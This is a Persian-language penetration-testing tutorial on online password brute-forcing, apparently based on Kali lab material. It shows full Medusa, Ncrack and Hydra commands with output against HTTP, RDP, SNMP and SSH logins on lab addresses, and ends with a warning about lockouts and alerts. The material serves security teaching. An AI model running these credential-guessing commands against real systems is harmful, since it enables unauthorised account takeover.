حملات آنلاین علیه پسوردها شامل تلاش هایی برای حدس زدن پسورد (password-guessing) های سرویس های تحت شبکه است که از محیط احراز هویت username و پسورد استفاده میکنند. این حمله شامل سرویس هایی نظیر HTTP, SSH, VNC, SNMP, POP3 و ... میشود. به منظور خودکار کردن حملات پسورد علیه یک سرویس تحت شبکه، باید بتوانیم درخواست احراز هویت پشت سر هم برای پروتکل مورد استفاده در آن سرویس تولید کنیم. خوشبختانه در این مورد ابزاری مانند Hydra, Medusa, Ncrack و حتی Metasploit بکمک ما می ایند و میتوانند درخواست های احراز هویت بسیاری را تولید کنند.
Hydra, Medusa و Ncrack
این سه ابزار را شاید بتوان گفت محبوبترین ابزار در انجام ممیزی امنیت پسورد هستند. با این حال این ابزار نقاط قدرت و ضعف خود را دارند و در عین حال پروتکل های مختلف را نیز پشتیبانی میکنند. هرکدام از این سه ابزار رفتاری و عملکردی شبیه به دیگری دارد اما با این وجود باید برای یادگیری کار کردن با ان ها زمانی را کنار گذاشت. ارزش وقت گذاشتن را دارند!
HTTP Brute-force
ابزار Medusa یک ابزار سریع، موازی کار و ماژولار در زمینه Brute-force کردن لاگین در نظر گرفته شده است. مثال زیر نمونه ای از حمله Brute-force با استفاده از ابزار Medusa است که بر علیه یک دایرکتوری وب محافظت شده صورت می پذیرد:
root@kali:~# medusa –h 192.168.11.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Account Check: [http] Host:192.168.11.219 (1 of 1, 0 complete) User:admin (1 of 1, 0 complete) Password:acquires (20 of 334 complete)
Account check: [http] Host: 192.168.11.219 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: Backup2 (21 of 334 complete)
Account Found: [http] Host:192.168.11.219 User: admin Password: backup2 [success]
RDP Brute-force
ابزار Ncrack که توسط سازندگان Nmap توسعه داده شده است، یک ابزار کرک احراز هویت شبکه ای و در عین حال بسیار پرسرعت است. ابزار Ncrack یکی از معدود ابزاری است که میتواند با اطمینان و سرعت لازم، پروتکل RDP ویندوز را مورد Brute-force قرار دهد:
root@kali:~# ncrack -vv --user offsec -P password-file.txt rdp://192.168.11.35
starting Ncrack 0.4ALPHA (http://ncrack.org) at 2015-09-28 14:14 EDT
Discovered credentials on rdp://192.168.11.35:3389 'offsec' 'offsec!'
SNMP Brute-force
THC-Hydra یکی دیگر از کرکرهای قدرتمند پسوردهای آنلاین است. از این ابزار میتوان در کرک پروتکل های مختلف احراز هویت مانند SNMP استفاده کرد:
root@kali:~# hydra –P password-file.txt -v 192.168.11.219 snmp
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28 14:15:00
[Data] 16 tasks, 1 server, 333 login ties (l:1/p:333), ~20 tries per task
[Data] attacking service snmp on port 161
[Verbose] Resolving address … done
[161] [snmp] host: 192.168.11.219 login: password: manager
SSH Brute-force
ابزار Hydra در Brute-force پروتکل SSH نیز کارایی خود را نشان میدهد:
root@kali:~# hydra –l root –P password-file.txt 192.168.11.219 ssh
Hydra v7.4.2 ©2012 by van Hauser/THC & David Maciejak
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28 14:15:00
[Data] 16 tasks, 1 server, 332 login tries (l:1/p:332), ~20 tries per task
[Data] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22] [ssh] host:192.168.11.219 login:root password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28 14:15:00
root@kali:~#
قفل شدن اکانت و لاگ ها هشدار دهنده
حملات Online password Brute-force، بر طبق طبع و ذاتشان بسیار پر سر و صدا و پرنمود هستند. تلاش های لاگین ناموفق آنهم به تعداد بسیار زیاد معمولا تولید لاگ و هشدار بر روی سیستم مقصد میکند. در برخی حالات سیستم هدف ممکن است طور تنظیم شده باشد که اکانت را پس از تعداد معینی لاگین ناموفق، لاک کند. حال اگر شما در حال اجرای یک تست نفوذ بر روی شبکه خودتان باشید، همین امر میتواند یک خروجی ناموفق را در حین اجرای تست نفوذ برای شما به همراه داشته باشد؛ چرا که کاربران مجاز ممکن است بدین واسطه نتوانند با حساب کاربری خود به سروی سهای مورد نظر خود دسترسی پیدا کنند و این امر تا زمانی که مدیر سیستم مجددا این حساب های کاربری را فعال نکند، ادامه خواهد داشت. پس حتما قبل از اجرای بی حساب و کتاب یک حمله Brute-force بصورت آنلاین این نکات را مد نظر داشته باشید.